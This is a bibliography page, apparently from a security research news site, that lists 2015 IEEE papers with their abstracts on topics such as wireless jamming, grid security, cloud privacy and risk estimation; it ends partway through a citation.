H. Rahbari; M. Krunz; L. Lazos, "Swift Jamming Attack on Frequency Offset Estimation: The Achilles Heel of OFDM Systems," in IEEE Transactions on Mobile Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TMC.2015.2456916

Abstract: Frequency offset (FO) refers to the difference in the operating frequencies of two radio oscillators. Failure to compensate for the FO may lead to decoding errors, particularly in OFDM systems. To correct the FO, wireless standards append a publicly known preamble to every frame before transmission. In this paper, we demonstrate how an adversary can exploit the known preamble structure of OFDM-based wireless systems, particularly IEEE802.11a/g/n/ac, to launch a very stealth (low energy/duty cycle) reactive jamming attack against the FO estimation mechanism. In this attack, the adversary quickly detects a transmitted OFDM frame and subsequently jams a tiny part of the preamble that is used for FO estimation at the legitimate receiver. By optimizing the energy and structure of the jamming signal and accounting for frame detection timing errors and unknown channel parameters, we empirically show that the adversary can induce a bit error rate close to 0.5, making the transmission practically irrecoverable. Such vulnerability to FO jamming exists even when the frame is shielded by efficient channel coding. We evaluate the FO estimation attack through simulations and USRP experimentation. We also propose three approaches to mitigate such an attack.

Keywords: Channel estimation; Estimation; IEEE 802.11 Standard; Jamming; OFDM; Timing; Wireless communication; IEEE802.11; OFDM;PHY-layer security; USRP implementation; frequency offset; reactive jamming (ID#: 16-9510)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163332&isnumber=4358975

 

J. Ma; G. Geng; Q. Jiang, "Two-Time-Scale Coordinated Energy Management for Medium-Voltage DC Systems," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TPWRS.2015.2504517

Abstract: In medium-voltage DC (MVDC) systems, to manage the impacts of uncertainty and variability brought by the high-penetrated renewable energy sources (RES), this paper proposes a two-time-scale coordinated energy management method. Based on a hierarchical control framework, the droop control is used and its two key factors, operating point and droop coefficient, are co-optimized. To improve operational benefits, operating points are determined in the reference optimization, considering the long-term cooperative operation of various integrated units. To enhance system security, droop coefficients are optimized in the coefficient optimization, where controllers' responses to the system unbalanced power and changes of system voltage profile within the dispatch interval are both considered. Since these two optimizations are performed in different time scales, a two-time-scale coordinated strategy is designed to balance long-term economic benefits and short-term security performance. The proposed approach is verified on a typical MVDC system which has a meshed network topology. Conventional and renewable energy sources as well as schedulable and unschedulable load demands are considered. Numerical experiments indicate that, the proposed approach is capable of providing economical and reliable dispatch, such that the forecast errors and fluctuations brought by the high-penetrated RESs and other unschedulable units can be adapted to.

Keywords: Economics; Energy management; Medium voltage; Optimization; Security; Uncertainty; Voltage control; Coefficient optimization; MVDC system; droop control; energy management; two-time-scale coordinated strategy (ID#: 16-9511)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7353227&isnumber=4374138

 

J. Yost, "The March of IDES: A History of the Intrusion Detection Expert System," in IEEE Annals of the History of Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/MAHC.2015.41

Abstract: This paper examines the pre-history and history of early intrusion detection expert systems by focusing the first such system, Intrusion Detection Expert System, or IDES, which was developed in the second half of the 1980s at SRI International (and SRI's follow-on Next Generation Intrusion Detection Expert System, or NIDES, in the early-to-mid 1990s). It also presents and briefly analyzes the outsized contribution of women scientists to leadership of this area of computer security research and development, contrasting it with the largely male-led work on "high-assurance" operating system design, development, and standard-setting.

Keywords: Communities; Computer security; Computers; Expert systems; History; Intrusion detection (ID#: 16-9512)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155454&isnumber=5255174

 

P. Henneaux; P. E. Labeau; J. C. Maun; L. Haarla, "A Two-Level Probabilistic Risk Assessment of Cascading Outages," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-11, 2015. doi: 10.1109/TPWRS.2015.2439214

Abstract: Cascading outages in power systems can lead to major power disruptions and blackouts and involve a large number of different mechanisms. The typical development of a cascading outage can be split in two phases with different dominant cascading mechanisms. As a power system is usually operated in N-1 security, an initiating contingency cannot entail a fast collapse of the grid. However, it can trigger a thermal transient, increasing significantly the likelihood of additional contingencies, in a “slow cascade.” The loss of additional elements can then trigger an electrical instability. This is the origin of the subsequent “fast cascade,” where a rapid succession of events can lead to a major power disruption. Several models of probabilistic simulations exist, but they tend to focus either on the slow cascade or on the fast cascade, according to mechanisms considered, and rarely on both. We propose in this paper a decomposition of the analysis in two levels, able to combine probabilistic simulations for the slow and the fast cascades. These two levels correspond to these two typical phases of a cascading outage. Models are developed for each of these phases. A simplification of the overall methodology is applied to two test systems to illustrate the concept.

Keywords: Computational modeling; Load modeling; Power system dynamics; Power system stability; Probabilistic logic; Steady-state; Transient analysis; Blackout; Monte Carlo methods; cascading failure; power system reliability; power system security; risk analysis (ID#: 16-9513)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7127060&isnumber=4374138

 

Y. Jia; Z. Xu; L. L. Lai; K. P. Wong, "Risk based Power System Security Analysis Considering Cascading Outages," in IEEE Transactions on Industrial Informatics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TII.2015.2499718

Abstract: Successful development of smart grid demands strengthened system security and reliability, which requires effective security analysis in conducting system operation and expansion planning. Classical N-1 criterion has been widely used to examine every creditable contingency through detailed computations in the past. The adequacy of such approach becomes doubtful in many recent blackouts where cascading outages are usually involved. This may be attributed to the increased complexities and nonlinearities involved in operating conditions and network structures in context of smart grid development. To address security threats particularly from cascading outages, a new and efficient security analysis approach is proposed, which comprises cascading failure simulation module (CFSM) for post-contingency analysis and risk evaluation module (REM) based on a decorrelated neural network ensembles (DNNE) algorithm. This approach overcomes the drawbacks of high computational cost in classical N-k induced cascading contingency analysis. Case studies on two different IEEE test systems and a practical transmission system—Polish 2383-bus system have been conducted to demonstrate the effectiveness of the proposed approach for risk evaluation of cascading contingency.

Keywords: Computational modeling; Load flow; Load modeling; Monte Carlo methods; Power system faults; Power system protection; Security; N-k contingency; cascading failures; data mining; security analysis; smart grids (ID#: 16-9514)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7327191&isnumber=4389054

 

K. E. Van Horn; A. D. Dominguez-Garcia; P. W. Sauer, "Measurement-Based Real-Time Security-Constrained Economic Dispatch," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TPWRS.2015.2493889

Abstract: In this paper, we propose a measurement-based approach to the real-time security-constrained economic dispatch (SCED). The real-time SCED is a widely used market scheduling tool that seeks to economically balance electricity supply and demand and provide locational marginal prices (LMPs), while ensuring system reliability standards are met. To capture network flows and security considerations, the conventional SCED formulation relies on sensitivities that are typically computed from a linearized power flow model, which is vulnerable to phenomena such as undetected topology changes, changes in the system operating point, and the existence of incorrect model data. Our approach to the formulation of the SCED problem utilizes power system sensitivities estimated from phasor measurement unit (PMU) measurements. The resulting measurement-based real-time SCED is robust against the aforementioned phenomena. Moreover, the dispatch instructions and LMPs calculated with the proposed measurement-based SCED accurately reflect real-time system conditions and security needs. We illustrate the strengths of the proposed approach via several case studies.

Keywords: Analytical models; Computational modeling; Economics; Phasor measurement units; Real-time systems; Security; Sensitivity; Contingency analysis; PMU; distribution factors; economic dispatch; estimation; operations; security (ID#: 16-9515)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7348719&isnumber=4374138

 

Y. Huang; X. Yuan; J. Hu; P. Zhou; D. Wang, "DC-Bus Voltage Control Stability Affected by AC-Bus Voltage Control in VSCs Connected to Weak AC Grids," in IEEE Journal of Emerging and Selected Topics in Power Electronics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/JESTPE.2015.2480859

Abstract: With widely application of voltage source converters (VSCs) in power system, DC-bus voltage control instabilities increasingly occurred in practical conditions, especially in weak AC grid, which poses challenges on stability and security of power converters applications. This paper aims to give physical insights into stability of DC-bus voltage control affected by AC-bus voltage control in VSC connected to weak grid. Concepts of damping and restoring components are developed for DC-bus voltage to describe stability of DC-bus voltage control. Impact of AC-bus voltage control on DC-bus voltage control stability can be revealed by investigating impact of AC-bus voltage control on damping and restoring components essentially. Furthermore, detailed analysis for impact of AC-bus voltage control on damping and restoring components are presented with considering varied AC system strengths, operating points, and AC-bus voltage control parameters. Simulation results from 1.5-MW full-capacity wind power generation system are demonstrated which conform well to the analysis. Finally the experiment results validate the analysis.

Keywords: Damping; Phase locked loops; Power conversion; Power system stability; Stability analysis; Voltage control; AC-bus voltage control; DC-bus voltage control; small-signal stability; voltage source converter; weak grid (ID#: 16-9516)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273745&isnumber=6507303

 

Y. Zhang; D. Li; Z. Sun; F. Zhao; J. Su; X. Lu, "CSR: Classified Source Routing in DHT-Based Networks," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2440242

Abstract: In recent years cloud computing provides a new way to address the constraints of limited energy, capabilities, and resources. Distributed hash table (DHT) based networks have become increasingly important for efficient communication in large-scale cloud systems. Previous studies mainly focus on improving the performance such as latency, scalability and robustness, but seldom consider the security demands on the routing paths, for example, bypassing untrusted intermediate nodes. Inspired by Internet source routing, in which the source nodes specify the routing paths taken by their packets, this paper presents CSR, a tag-based, Classified Source Routing scheme in DHT-based cloud networks to satisfy the security demands on the routing paths. Different from Internet source routing which requires some map of the overall network, CSR operates in a distributed manner where nodes with certain security level are tagged with a label and routing messages requiring that level of security are forwarded only to the qualified next-hops. We show how this can be achieved efficiently, by simple extensions of the traditional routing structures, and safely, so that the routing is uniformly convergent. The effectiveness of our proposals is demonstrated through theoretical analysis and extensive simulations.

Keywords: Cloud computing; Robustness; Routing; Security; Servers; Topology; CSR (classified source routing); DLG-de Bruijn (DdB); distributed hash table (DHT); path diversity; tag (ID#: 16-9517)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116526&isnumber=6562694

 

L. Xu; J. Lee; S. H. Kim; Q. Zheng; S. Xu; T. Suh; W. W. Ro; W. Shi, "Architectural Protection of Application Privacy Against Software and Physical Attacks in Untrusted Cloud Environment," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2511728

Abstract: In cloud computing, it is often assumed that cloud vendors are trusted; the guest Operating System (OS) and the Virtual Machine Monitor (VMM, also called Hypervisor) are secure. However, these assumptions are not always true in practice and existing approaches cannot protect the data privacy of applications when none of these parties are trusted. We investigate how to cope with a strong threat model which is that the cloud vendors, the guest OS, or the VMM, or both of them are malicious or untrusted, and can launch attacks against privacy of trusted user applications. This model is relevant because applications may be small enough to be formally verified, while the guest OS and VMM are too complex to be formally verified. Specifically, we present the design and analysis of an architectural solution which integrates a set of components on-chip to protect the memory of trusted applications from potential software and hardware based attacks from untrusted cloud providers, compromised guest OS, or malicious VMM. Full-system performance evaluation results show that the design only incurs 9% overhead on average, which is a small performance price that is paid for the substantial security gain.

Keywords: Cloud computing; Context; Hardware; Kernel; Privacy; Security; Virtual machine monitors; Architectural Support; Security; Virtualization (ID#: 16-9518)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7364212&isnumber=6562694

 

W. Zeng; Y. Zhang; M. Y. Chow, "Resilient Distributed Energy Management Subject to Unexpected Misbehaving Generation Units," in IEEE Transactions on Industrial Informatics, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TII.2015.2496228

Abstract: Distributed energy management algorithms are being developed for the smart grid to efficiently and economically allocate electric power among connected distributed generation units and loads. The use of such algorithms provides flexibility, robustness, and scalability, while it also increases the vulnerability of smart grid to unexpected faults and adversaries. The potential consequences of compromising the power system can be devastating to public safety and economy. Thus, it is important to maintain the acceptable performance of distributed energy management algorithms in a smart grid environment under malicious cyberattacks. In this paper, a neighborhood-watch based distributed energy management algorithm is proposed to guarantee the accurate control computation in solving the economic dispatch problem in the presence of compromised generation units. The proposed method achieves the system resilience by performing a reliable distributed control without a central coordinator and allowing all the well-behaving generation units to reach the optimal operating point asymptotically. The effectiveness of the proposed method is demonstrated through case studies under several different adversary scenarios.

Keywords: Algorithm design and analysis; Energy management; Integrated circuits; Resilience; Security; Smart grids; Economic dispatch; neighborhood-watch; resilient distributed energy management (ID#: 16-9519)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312956&isnumber=4389054

 

T. Pasquier; J. Singh; D. Eyers; J. Bacon, "CamFlow: Managed Data-sharing for Cloud Services," in IEEE Transactions on Cloud Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCC.2015.2489211

Abstract: A model of cloud services is emerging whereby a few trusted providers manage the underlying hardware and communications whereas many companies build on this infrastructure to offer higher level, cloud-hosted PaaS services and/or SaaS applications. From the start, strong isolation between cloud tenants was seen to be of paramount importance, provided first by virtual machines (VM) and later by containers, which share the operating system (OS) kernel. Increasingly it is the case that applications also require facilities to effect isolation and protection of data managed by those applications. They also require flexible data sharing with other applications, often across the traditional cloud-isolation boundaries; for example, when government provides many related services for its citizens on a common platform. Similar considerations apply to the end-users of applications. But in particular, the incorporation of cloud services within ‘Internet of Things’ architectures is driving the requirements for both protection and cross-application data sharing. These concerns relate to the management of data. Traditional access control is application and principal/role specific, applied at policy enforcement points, after which there is no subsequent control over where data flows; a crucial issue once data has left its owner’s control by cloud-hosted applications and within cloud-services. Information Flow Control (IFC), in addition, offers system-wide, end-to-end, flow control based on the properties of the data. We discuss the potential of cloud-deployed IFC for enforcing owners’ dataflow policy with regard to protection and sharing, as well as safeguarding against malicious or buggy software. In addition, the audit log associated with IFC provides transparency, giving configurable system-wide visibility over data flows. This helps those responsible to meet their data management obligations, providing evidence of compliance, and aids in the ident- fication of policy errors and misconfigurations. We present our IFC model and describe and evaluate our IFC architecture and implementation (CamFlow). This comprises an OS level implementation of IFC with support for application management, together with an IFC-enabled middleware. Our contribution is to demonstrate the feasibility of incorporating IFC into cloud services: we show how the incorporation of IFC into cloud-provided OSs underlying PaaS and SaaS would address application sharing and protection requirements, and more generally, greatly enhance the trustworthiness of cloud services at all levels, at little overhead, and transparently to tenants.

Keywords: Access control; Cloud computing; Computational modeling; Computer architecture; Containers; Context; Audit; Cloud; Compliance; Data Management; Information Flow Control; Linux Security Module; Middleware; PaaS; Provenance; Security (ID#: 16-9520)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7295590&isnumber=6562694

 

L. Wu; X. Du; J. Wu, "Effective Defense Schemes for Phishing Attacks on Mobile Computing Platforms," in IEEE Transactions on Vehicular Technology, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TVT.2015.2472993

Abstract: Recent years have witnessed the increasing threat of phishing attacks on mobile computing platforms. In fact, mobile phishing is particularly dangerous due to the hardware limitations of mobile devices and mobile user habits. In this paper, we did a comprehensive study on the security vulnerabilities caused by mobile phishing attacks, including the web page phishing attacks, the application phishing attacks, and the account registry phishing attacks. Existing schemes designed for web phishing attacks on PCs cannot effectively address the various phishing attacks on mobile devices. Hence, we propose MobiFish, a novel automated lightweight anti-phishing scheme for mobile platforms. MobiFish verifies the validity of web pages, applications, and persistent accounts by comparing the actual identity to the claimed identity. MobiFish has been implemented on a Nexus 4 smartphone running the Android 4.2 operating system. We experimentally evaluate the performance of MobiFish with 100 phishing URLs and corresponding legitimate URLs, as well as phishing apps. The results show that MobiFish is very effective in detecting phishing attacks on mobile phones.

Keywords: Browsers; HTML; Mobile communication; Mobile handsets; Twitter; Uniform resource locators; Web pages; Mobile computing; phishing attacks; security and protection (ID#: 16-9521)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7222471&isnumber=4356907

 

T. Wu; K. Ganesan; A. Hu; H. S. P. Wong; S. Wong; S. Mitra, "TPAD: Hardware Trojan Prevention and Detection for Trusted Integrated Circuits," in IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCAD.2015.2474373

Abstract: There are increasing concerns about possible malicious modifications of integrated circuits (ICs) used in critical applications. Such attacks are often referred to as hardware Trojans. While many techniques focus on hardware Trojan detection during IC testing, it is still possible for attacks to go undetected. Using a combination of new design techniques and new memory technologies, we present a new approach that detects a wide variety of hardware Trojans during IC testing and also during system operation in the field. Our approach can also prevent a wide variety of attacks during synthesis, place-and-route, and fabrication of ICs. It can be applied to any digital system, and can be tuned for both traditional and split-manufacturing methods. We demonstrate its applicability for both ASICs and FPGAs. Using fabricated test chips with Trojan emulation capabilities and also using simulations, we demonstrate: 1. The area and power costs of our approach can range between 7.4-165% and 7-60%, respectively, depending on the design and the attacks targeted; 2. The speed impact can be minimal (close to 0%); 3. Our approach can detect 99.998% of Trojans (emulated using test chips) that do not require detailed knowledge of the design being attacked; 4. Our approach can prevent 99.98% of specific attacks (simulated) that utilize detailed knowledge of the design being attacked (e.g., through reverse-engineering). 5. Our approach never produces any false positives, i.e., it does not report attacks when the IC operates correctly.

Keywords: Encoding; Hardware; Integrated circuits; Monitoring; Random access memory; Trojan horses;Wires;3D Integration; Concurrent Error Detection; Hardware Security; Hardware Trojan; Randomized Codes; Reliable Computing; Resistive RAM; Split-manufacturing (ID#: 16-9522)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7229283&isnumber=6917053

 

K. Huguenin; E. Le Merrer; N. Le Scouarnec; G. Straub, "Efficient and Transparent Wi-Fi Offloading for HTTP(S) POSTs," in IEEE Transactions on Mobile Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TMC.2015.2442237

Abstract: With the emergence of online platforms for (social) sharing, collaboration and backing up, mobile users generate ever-increasing amounts of digital data, such as documents, photos and videos, which they upload while on the go. Cellular Internet connectivity (e.g., 3G/4G) enables mobile users to upload their data but drains the battery of their devices and overloads mobile service providers. Wi-Fi data offloading overcomes the aforementioned issues for delay-tolerant data. However, it comes at the cost of constrained mobility for users, as they are required to stay within a given area while the data is uploaded. The up-link of the broadband connection of the access point often constitutes a bottleneck and incurs waiting times of up to tens of minutes. In this paper, we advocate the exploitation of the storage capabilities of common devices located on the Wi-Fi access point’s LAN, typically residential gateways, NAS units or set-top boxes, to decrease the waiting time. We propose HOOP, a system for offloading upload tasks onto such devices. HOOP operates seamlessly on HTTP(S) POST, which makes it highly generic and widely applicable; it also requires limited changes on the gateways and on the web servers and none to existing protocols or browsers. HOOP is secure and, in a typical setting, reduces the waiting time by up to a factor of 46. We analyze the security of HOOP and evaluate its performance by correlating mobility traces of users with the position of the Wi-Fi access points of a leading community network (i.e., FON) that relies on major national ISPs. We show that, in practice, HOOP drastically decreases the delay between the time the photo is taken and the time it is uploaded, compared to regular Wi-Fi data offloading. We also demonstrate the practicality of HOOP by implementing it on a wireless router.

Keywords: Browsers; HTML; IEEE 802.11 Standards; Logic gates; Mobile communication; Mobile handsets; Web services; Delay-tolerant networking; Web technologies; Wi-Fi offloading (ID#: 16-9523)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7118725&isnumber=4358975

 

J. Zhu; Y. Zou; B. Champagne; W. P. Zhu; L. Hanzo, "Security-Reliability Trade-off Analysis of Multi-Relay Aided Decode-and-Forward Cooperation Systems," in IEEE Transactions on Vehicular Technology, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TVT.2015.2453364

Abstract: We consider a cooperative wireless network comprised of a source, a destination and multiple relays operating in the presence of an eavesdropper, which attempts to tap the source-destination transmission. We propose multi-relay selection scheme for protecting the source against eavesdropping. More specifically, multi-relay selection allows multiple relays to simultaneously forward the source’s transmission to the destination, differing from the conventional single-relay selection where only the best relay is chosen to assist the transmission from the source to destination. For the purpose of comparison, we consider the classic direct transmission and single-relay selection as benchmark schemes. We derive closed-form expressions of the intercept probability and outage probability for the direct transmission as well as for the single-relay and multi-relay selection schemes over Rayleigh fading channels. It is demonstrated that as the outage requirement is relaxed, the intercept performance of the three schemes improves and vice versa, implying that there is a security versus reliability trade-off (SRT). We also show that both the single-relay and multi-relay selection schemes outperform the direct transmission in terms of SRT, demonstrating the advantage of the relay selection schemes for protecting the source’s transmission against the eavesdropping attacks. Finally, upon increasing the number of relays, the SRTs of both the singlerelay and multi-relay selection schemes improve significantly and as expected, multi-relay selection outperforms single-relay selection.

Keywords: Channel capacity; Closed-form solutions; Communication system security; Fading; Relays; Security; Wireless communication; Security-reliability trade-off; eavesdropping attack; intercept probability; outage probability; relay selection (ID#: 16-9524)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7152959&isnumber=4356907

 

Z. Yang; P. Cheng; J. Chen, "Learning-based Jamming Attack against Low-duty-cycle Networks," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2501288

Abstract: Jamming is a typical attack by exploiting the nature of wireless communication. Lots of researchers are working on improving energy-efficiency of jamming attack from the attacker’s view. Whereas, in the low-duty-cycle wireless sensor networks where nodes stay asleep most of time, the design of jamming attack becomes even more challenging especially when considering the stochastic transmission pattern arising from both the clock drift and other uncertainties. In this paper, we propose LearJam, a novel learning-based jamming attack strategy against low-duty-cycle networks, which features the two-phase design consisting of the learning phase and attacking phase. Then in order to degrade the network throughput to the maximal degree, LearJam jointly optimizes these two phases subject to the energy constraint. Moreover, such process of optimization is operated iteratively to accommodate the requirement of practical implementation. Conversely, we also discuss how the state-of-the-art mechanisms can defend against LearJam, which will aid the researchers to improve the security of low-duty-cycle networks. Extensive simulations show that our design achieves significantly higher number of successful attacks and reduces the network’s throughput considerably, especially in a sparse low-duty-cycle network, compared with some typical jamming strategies.

Keywords: Clocks; Jamming; Sensors; Throughput; Uncertainty; Wireless communication; Wireless sensor networks; Security; cyber-physical system; jamming attack; low-duty-cycle network (ID#: 16-9525)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7329984&isnumber=4358699

 

Y. Zhang; Y. Shen; H. Wang; J. Yong; X. Jiang, "On Secure Wireless Communications for IoT Under Eavesdropper Collusion," in IEEE Transactions on Automation Science and Engineering,  vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TASE.2015.2497663

Abstract: Wireless communication is one of the key technologies that actualize the Internet of Things (IoT) concept into the real world. Understanding the security performance of wireless communications lays the foundation for the security management of IoT. Eavesdropper collusion represents a significant threat to wireless communication security, while physical-layer security serves as a promising approach to providing a strong form of security guarantee. This paper studies the important secrecy outage performance of wireless communications under eavesdropper collusion, where the physical layer security is adopted to counteract such attack. Based on the classical Probability Theory, we first conduct analysis on the secrecy outage of the simple noncolluding case in which eavesdroppers do not collude and operate independently. For the secrecy outage analysis of the more hazardous M-colluding scenario, where any M  eavesdroppers can combine their observations to decode the message, the techniques of Laplace transform, keyhole contour integral, and Cauchy Integral Theorem are jointly adopted to work around the highly cumbersome multifold convolution problem involved in such analysis, such that the related signal-to-interference ratio modeling for all colluding eavesdroppers can be conducted and thus the corresponding secrecy outage probability can be analytically determined. Finally, simulation and numerical results are provided to illustrate our theoretical achievements. An interesting observation suggests that the SOP increases first superlinearly and then sublinearly with M Keywords: Communication system security; Data collection; Relays; Security; Sensors; Wireless communication; Wireless sensor networks; Eavesdropper collusion; Internet of Things (IoT); physical layer security; secrecy outage performance; wireless communication (ID#: 16-9526)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7350251&isnumber=4358066


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

 

 

Risk Estimation 2015

 

 
SoS Logo

Risk Estimation 2015

 

Risk estimation is relevant to the Science of Security hard problems of predictive metrics, human behavior, and resilience.  The work cited here was presented in 2015.


Vukovic, M.; Skocir, P.; Katusic, D.; Jevtic, D.; Trutin, D.; Delonga, L., "Estimating Real World Privacy Risk Scenarios," in Telecommunications (ConTEL), 2015 13th International Conference on, vol., no., pp.1-7, 13-15 July 2015. doi: 10.1109/ConTEL.2015.7231214

Abstract: User privacy is becoming an issue on the Internet due to common data breaches and various security threats. Services tend to require private user data in order to provide more personalized content and users are typically unaware of potential risks to their privacy. This paper continues our work on the proposed user privacy risk calculator based on a feedforward neural network. Along with risk estimation, we provide the users with real world example scenarios that depict privacy threats according to selected input parameters. In this paper, we present a model for selecting the most probable real world scenario, presented as a comic, and thus avoid overwhelming the user with lots of information that he/she may find confusing. Most probable scenario estimations are performed by artificial neural network that is trained with real world scenarios and estimated probabilities from real world occurrences. Additionally, we group real world scenarios into categories that are presented to the user as further reading regarding privacy risks.

Keywords: data privacy; feedforward neural nets; learning (artificial intelligence); probability; artificial neural network training; data breach; feed-forward neural network; input parameter selection; personalized content; privacy risks; privacy threats; private user data; probabilities; real-world privacy risk scenario estimation; risk estimation; security threats; user privacy; user privacy risk calculator; Calculators; Electronic mail; Estimation; Internet; Law; Privacy (ID#: 16-9302)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231214&isnumber=7231179

 

Kasmi, C.; Lallechere, S.; Girard, S.; Prouff, E.; Paladian, F.; Bonnet, P., "Optimization of Experimental Procedure In EMC using Re-Sampling Techniques," in Electromagnetic Compatibility (EMC), 2015 IEEE International Symposium on, pp.1238-1242, 16-22 Aug. 2015. doi: 10.1109/ISEMC.2015.7256347

Abstract: Recent studies have shown a high interest in statistical methods dedicated to the prediction of the maximum confidence in simulation and measurements for Electromagnetic Compatibility. In particular, it has been shown that one of the main issues remains the access to a number of samples allowing estimating the risks with regard to the test set-up random variables. In this paper it is argued that re-sampling techniques, also called bootstrapping procedures, enable to optimize the number of experiments while estimating the maximum confidence level of the accessible samples.

Keywords: electromagnetic compatibility; optimisation; statistical analysis; EMC; bootstrapping procedures; electromagnetic compatibility; experimental procedure optimization; re-sampling techniques; risk estimation; set-up random variables; statistical methods; Convergence; Electromagnetic compatibility; Estimation; Optimization; Silicon; Sociology; Standards; Electromagnetic Compatibility; Experiments optimization; Statistical methods (ID#: 16-9303)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7256347&isnumber=7256113

 

Aldini, A.; Seigneur, J.-M.; Lafuente, C.B.; Titi, X.; Guislain, J., "Formal Modeling and Verification of Opportunity-enabled Risk Management," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 676-684, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.434

Abstract: With the advent of the Bring-Your-Own-Device (BYOD) trend, mobile work is achieving a widespread diffusion that challenges the traditional view of security standard and risk management. A recently proposed model, called opportunity-enabled risk management (OPPRIM), aims at balancing the analysis of the major threats that arise in the BYOD setting with the analysis of the potential increased opportunities emerging in such an environment, by combining mechanisms of risk estimation with trust and threat metrics. Firstly, this paper provides a logic-based formalization of the policy and metric specification paradigm of OPPRIM. Secondly, we verify the OPPRIM model with respect to the socio-economic perspective. More precisely, this is validated formally by employing tool-supported quantitative model checking techniques.

Keywords: formal specification; formal verification; mobile computing; risk management; security of data; BYOD trend; OPPRIM model; bring-your-own-device; formal modeling; formal verification; logic-based formalization; metric specification paradigm; mobile work; opportunity-enabled risk management; risk management; security standard; socio-economic perspective; threat metric; tool-supported quantitative model checking techniques; trust metric; Access control; Companies; Measurement; Mobile communication; Real-time systems; Risk management; BYOD; model checking; opportunity analysis; risk management (ID#: 16-9304)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345342&isnumber=7345233

 

Abbinaya, S.; Kumar, M.S., "Software Effort and Risk Assessment using Decision Table Trained by Neural Networks," in Communications and Signal Processing (ICCSP), 2015 International Conference on,  pp. 1389-1394, 2-4 April 2015. doi: 10.1109/ICCSP.2015.7322738

Abstract: Software effort estimations are based on prediction properties of system with attention to develop methodologies. Many organizations follow the risk management but the risk identification techniques will differ. In this paper, we focus on two effort estimation techniques such as use case point and function point are used to estimate the effort in the software development. The decision table is used to compare these two methods to analyze which method will produce the accurate result. The neural network is used to train the decision table with the use of back propagation training algorithm and compare these two effort estimation methods (use case point and function point) with the actual effort. By using the past project data, the estimation methods are compared. Similarly risk will be evaluated by using the summary of questionnaire received from the various software developers. Based on the report, we can also mitigate the risk in the future process.

Keywords: decision tables; learning (artificial intelligence); neural nets; risk management; software engineering; decision table; neural networks; risk assessment; risk identification techniques; software development; software effort; Algorithm design and analysis; Lead; Security; artificial neural network; back propagation; decision table; feed forward neural networks; function point; regression; risk evaluation; software effort estimation; use case point (ID#: 16-9305)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322738&isnumber=7322423

 

Abd Latif, Z.; Mohamad, M.H., "Mapping of Dengue Outbreak Distribution Using Spatial Statistics and Geographical Information System," in Information Science and Security (ICISS), 2015 2nd International Conference on, pp. 1-6, 14-16 Dec. 2015. doi: 10.1109/ICISSEC.2015.7371016

